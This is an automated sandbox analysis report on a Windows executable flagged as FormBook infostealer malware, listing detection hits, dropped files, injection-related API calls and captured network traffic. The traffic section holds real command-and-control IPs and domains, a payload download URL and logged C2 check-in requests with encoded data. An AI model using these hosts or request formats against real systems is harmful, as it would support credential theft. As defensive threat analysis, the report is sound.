Windows Analysis Report
Forhandlingsfriheden.exe

AI detected suspicious sample

Source: Yara match	File source: 00000009.00000002.3360830946.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3359528997.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3053262929.000000001F460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3360872808.0000000003290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3053719794.0000000020EC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3361007357.00000000042C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Forhandlingsfriheden.exe

Joe Sandbox ML: detected

Source: Forhandlingsfriheden.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: Forhandlingsfriheden.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mshtml.pdb source: Opfattelsers.exe, 00000006.00000001.2794074840.0000000000649000.00000020.00000001.01000000.00000008.sdmp
Source:	Binary string: CallSite.Targetore.pdbs source: powershell.exe, 00000002.00000002.2794477893.0000000000638000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: PxuyeSuijNdsM.exe, 00000008.00000002.3359525503.000000000038E000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: wntdll.pdbUGP source: Opfattelsers.exe, 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmp, Opfattelsers.exe, 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Opfattelsers.exe, 00000006.00000003.2934822326.000000001F416000.00000004.00000020.00020000.00000000.sdmp, Opfattelsers.exe, 00000006.00000003.2936587468.000000001F5C5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.3361124338.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.3027687212.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.3361124338.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.3029685656.0000000003500000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.2802643987.0000000007E83000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Opfattelsers.exe, Opfattelsers.exe, 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmp, Opfattelsers.exe, 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Opfattelsers.exe, 00000006.00000003.2934822326.000000001F416000.00000004.00000020.00020000.00000000.sdmp, Opfattelsers.exe, 00000006.00000003.2936587468.000000001F5C5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000009.00000002.3361124338.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.3027687212.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.3361124338.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.3029685656.0000000003500000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdbUGP source: Opfattelsers.exe, 00000006.00000001.2794074840.0000000000649000.00000020.00000001.01000000.00000008.sdmp
Source:	Binary string: svchost.pdb source: Opfattelsers.exe, 00000006.00000003.2995513897.0000000003B54000.00000004.00000020.00020000.00000000.sdmp, Opfattelsers.exe, 00000006.00000003.2995430924.0000000003B4A000.00000004.00000020.00020000.00000000.sdmp, PxuyeSuijNdsM.exe, 00000008.00000003.3103486155.0000000001435000.00000004.00000020.00020000.00000000.sdmp, PxuyeSuijNdsM.exe, 00000008.00000003.2965427786.000000000142B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: Opfattelsers.exe, 00000006.00000003.2995513897.0000000003B54000.00000004.00000020.00020000.00000000.sdmp, Opfattelsers.exe, 00000006.00000003.2995430924.0000000003B4A000.00000004.00000020.00020000.00000000.sdmp, PxuyeSuijNdsM.exe, 00000008.00000003.3103486155.0000000001435000.00000004.00000020.00020000.00000000.sdmp, PxuyeSuijNdsM.exe, 00000008.00000003.2965427786.000000000142B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbk source: powershell.exe, 00000002.00000002.2802643987.0000000007E83000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Forhandlingsfriheden.exe	Code function: 0_2_0040689E FindFirstFileW,FindClose,	0_2_0040689E
Source: C:\Users\user\Desktop\Forhandlingsfriheden.exe	Code function: 0_2_00405C4D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C4D
Source: C:\Users\user\Desktop\Forhandlingsfriheden.exe	Code function: 0_2_00402930 FindFirstFileW,	0_2_00402930
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_029CC660 FindFirstFileW,FindNextFileW,FindClose,	9_2_029CC660

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then xor eax, eax		9_2_029B9EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then mov ebx, 00000004h		9_2_0360051F

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49915 -> 165.22.38.185:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49954 -> 154.88.22.104:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49961 -> 154.88.22.104:80

Source: Joe Sandbox View	ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
Source: Joe Sandbox View	ASN Name: CNSERVERSUS CNSERVERSUS

Source: Network traffic

Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49850 -> 212.162.149.66:80

Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.66
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.66
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.66
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.66
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.66
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.66
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.66
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.66
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.66
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.66
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.66
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.66
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.66
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.66
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.66
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.66
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.66
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.66
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.66
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.66
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.66
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.66
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.66
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.66
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.66
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.66
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.66
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.66
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.66
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.66
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.66
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.66
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.66
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.66
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.66
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.66
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.66
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.66
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.66
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.66
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.66
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.66
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.66
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.66
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.66
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.66
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.66
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.66
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.66
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.66

Source: global traffic	HTTP traffic detected: GET /KtFSlX90.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 212.162.149.66Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /rym4/?uVKlz=ndVa/RILK9FLDRpgtoZJ+J8IBXYKH57ZDy7Pf7hM0FMVC1dzhL8viYhuuez44cZISqlmpTXSVNjrzOBKappePk6RQICM+G+QyTBiA70rdrzzN+VPX4YC9zgU1gXoNV1ZFV83DTE=&RPITK=DxtTE6 HTTP/1.1Host: www.carhireheaven.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+

Source: global traffic	DNS traffic detected: DNS query: www.carhireheaven.online
Source: global traffic	DNS traffic detected: DNS query: www.dy01urj.pro

Source: unknown

HTTP traffic detected: POST /f425/ HTTP/1.1Host: www.dy01urj.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Origin: http://www.dy01urj.proReferer: http://www.dy01urj.pro/f425/Cache-Control: no-cacheContent-Length: 210Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+Data Raw: 75 56 4b 6c 7a 3d 33 71 2b 42 32 72 54 6d 48 63 79 54 69 5a 71 37 68 4a 67 52 55 6d 4b 33 66 4d 45 39 68 48 47 65 4e 69 39 39 5a 6d 35 51 73 43 4f 71 7a 42 35 41 59 51 4b 75 38 54 70 2f 4d 7a 45 50 45 4c 43 72 66 4a 34 6a 61 68 74 5a 7a 52 62 64 76 62 57 48 2b 42 52 61 71 56 35 79 5a 2f 64 67 63 7a 76 53 61 48 44 4c 76 32 41 67 2b 69 55 42 45 36 75 35 45 73 6c 4f 4f 6d 4c 71 6c 55 65 38 62 51 7a 6a 77 37 2f 44 6f 4d 52 4b 53 37 39 32 76 44 56 68 32 6b 61 75 7a 34 53 39 71 42 70 55 36 6d 42 62 36 35 7a 6f 66 7a 58 5a 73 6f 46 32 53 38 4b 4f 31 67 35 56 48 33 49 63 32 76 53 62 37 47 6f 54 4e 65 52 77 54 63 38 42 73 33 4d 56 Data Ascii: uVKlz=3q+B2rTmHcyTiZq7hJgRUmK3fME9hHGeNi99Zm5QsCOqzB5AYQKu8Tp/MzEPELCrfJ4jahtZzRbdvbWH+BRaqV5yZ/dgczvSaHDLv2Ag+iUBE6u5EslOOmLqlUe8bQzjw7/DoMRKS792vDVh2kauz4S9qBpU6mBb65zofzXZsoF2S8KO1g5VH3Ic2vSb7GoTNeRwTc8Bs3MV

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Date: Tue, 10 Dec 2024 12:53:41 GMTContent-Type: text/htmlContent-Length: 162Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>

Source: Opfattelsers.exe, 00000006.00000003.2935042588.0000000003B3A000.00000004.00000020.00020000.00000000.sdmp, Opfattelsers.exe, 00000006.00000002.3039878471.0000000003B3C000.00000004.00000020.00020000.00000000.sdmp, Opfattelsers.exe, 00000006.00000003.2935165232.0000000003B3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://212.162.149.66/
Source: Opfattelsers.exe, 00000006.00000002.3039764364.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, Opfattelsers.exe, 00000006.00000002.3039764364.0000000003B2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://212.162.149.66/KtFSlX90.bin
Source: Opfattelsers.exe, 00000006.00000002.3039764364.0000000003B2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://212.162.149.66/KtFSlX90.bin%
Source: Opfattelsers.exe, 00000006.00000002.3039764364.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://212.162.149.66/KtFSlX90.bin&
Source: Opfattelsers.exe, 00000006.00000002.3039764364.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://212.162.149.66/KtFSlX90.binsd
Source: powershell.exe, 00000002.00000002.2802643987.0000000007E83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m
Source: Forhandlingsfriheden.exe, Opfattelsers.exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.2797989403.0000000005746000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.2795610607.0000000004838000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2795610607.0000000004838000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000002.00000002.2795610607.00000000046E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2795610607.0000000004838000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000002.00000002.2795610607.0000000004838000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: PxuyeSuijNdsM.exe, 00000008.00000002.3367185482.0000000008CCA000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.dy01urj.pro
Source: PxuyeSuijNdsM.exe, 00000008.00000002.3367185482.0000000008CCA000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.dy01urj.pro/f425/
Source: Opfattelsers.exe, 00000006.00000001.2794074840.0000000000649000.00000020.00000001.01000000.00000008.sdmp	String found in binary or memory: http://www.ftp.ftp://ftp.gopher.
Source: Opfattelsers.exe, 00000006.00000001.2794074840.00000000005F2000.00000020.00000001.01000000.00000008.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: Opfattelsers.exe, 00000006.00000001.2794074840.00000000005F2000.00000020.00000001.01000000.00000008.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: svchost.exe, 00000009.00000003.3220845054.0000000008536000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000002.00000002.2795610607.00000000046E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000002.00000002.2795610607.0000000004838000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: svchost.exe, 00000009.00000003.3220845054.0000000008536000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: svchost.exe, 00000009.00000003.3220845054.0000000008536000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: svchost.exe, 00000009.00000003.3220845054.0000000008536000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000002.00000002.2797989403.0000000005746000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.2797989403.0000000005746000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.2797989403.0000000005746000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: svchost.exe, 00000009.00000003.3220845054.0000000008536000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: svchost.exe, 00000009.00000003.3220845054.0000000008536000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: svchost.exe, 00000009.00000003.3220845054.0000000008536000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000002.00000002.2795610607.0000000004838000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: Opfattelsers.exe, 00000006.00000001.2794074840.0000000000649000.00000020.00000001.01000000.00000008.sdmp	String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: powershell.exe, 00000002.00000002.2799477621.0000000006E0B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ion=v4.5sPu7
Source: svchost.exe, 00000009.00000002.3360142392.0000000003040000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: svchost.exe, 00000009.00000002.3360110277.0000000003029000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: svchost.exe, 00000009.00000003.3216409535.0000000008100000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: svchost.exe, 00000009.00000002.3360142392.0000000003040000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: svchost.exe, 00000009.00000002.3360142392.0000000003040000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: svchost.exe, 00000009.00000002.3360142392.0000000003040000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: svchost.exe, 00000009.00000002.3360110277.0000000003029000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: powershell.exe, 00000002.00000002.2797989403.0000000005746000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000009.00000003.3220845054.0000000008536000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: svchost.exe, 00000009.00000003.3220845054.0000000008536000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: C:\Users\user\Desktop\Forhandlingsfriheden.exe

Code function: 0_2_00405705 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405705

E-Banking Fraud

Source: Yara match	File source: 00000009.00000002.3360830946.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3359528997.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3053262929.000000001F460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3360872808.0000000003290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3053719794.0000000020EC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3361007357.00000000042C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7E35C0 NtCreateMutant,LdrInitializeThunk,	6_2_1F7E35C0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7E2DF0 NtQuerySystemInformation,LdrInitializeThunk,	6_2_1F7E2DF0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7E2C70 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_1F7E2C70
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7E2B60 NtClose,LdrInitializeThunk,	6_2_1F7E2B60
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7E3D70 NtOpenThread,	6_2_1F7E3D70
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7E3D10 NtOpenProcessToken,	6_2_1F7E3D10
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7E39B0 NtGetContextThread,	6_2_1F7E39B0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7E3010 NtOpenDirectoryObject,	6_2_1F7E3010
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7E3090 NtSetValueKey,	6_2_1F7E3090
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7E2F60 NtCreateProcessEx,	6_2_1F7E2F60
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7E2F30 NtCreateSection,	6_2_1F7E2F30
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7E2FE0 NtCreateFile,	6_2_1F7E2FE0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7E2FB0 NtResumeThread,	6_2_1F7E2FB0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7E2FA0 NtQuerySection,	6_2_1F7E2FA0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7E2F90 NtProtectVirtualMemory,	6_2_1F7E2F90
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7E2E30 NtWriteVirtualMemory,	6_2_1F7E2E30
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7E2EE0 NtQueueApcThread,	6_2_1F7E2EE0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7E2EA0 NtAdjustPrivilegesToken,	6_2_1F7E2EA0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7E2E80 NtReadVirtualMemory,	6_2_1F7E2E80
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7E2D30 NtUnmapViewOfSection,	6_2_1F7E2D30
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7E2D10 NtMapViewOfSection,	6_2_1F7E2D10
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7E2D00 NtSetInformationFile,	6_2_1F7E2D00
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7E2DD0 NtDelayExecution,	6_2_1F7E2DD0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7E2DB0 NtEnumerateKey,	6_2_1F7E2DB0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7E2C60 NtCreateKey,	6_2_1F7E2C60
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7E2C00 NtQueryInformationProcess,	6_2_1F7E2C00
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7E2CF0 NtOpenProcess,	6_2_1F7E2CF0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7E2CC0 NtQueryVirtualMemory,	6_2_1F7E2CC0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7E2CA0 NtQueryInformationToken,	6_2_1F7E2CA0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7E2BF0 NtAllocateVirtualMemory,	6_2_1F7E2BF0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7E2BE0 NtQueryValueKey,	6_2_1F7E2BE0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7E2BA0 NtEnumerateValueKey,	6_2_1F7E2BA0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7E2B80 NtQueryInformationFile,	6_2_1F7E2B80
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7E2AF0 NtWriteFile,	6_2_1F7E2AF0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7E2AD0 NtReadFile,	6_2_1F7E2AD0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7E2AB0 NtWaitForSingleObject,	6_2_1F7E2AB0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7E4650 NtSuspendThread,	6_2_1F7E4650
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7E4340 NtSetContextThread,	6_2_1F7E4340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03774340 NtSetContextThread,LdrInitializeThunk,	9_2_03774340
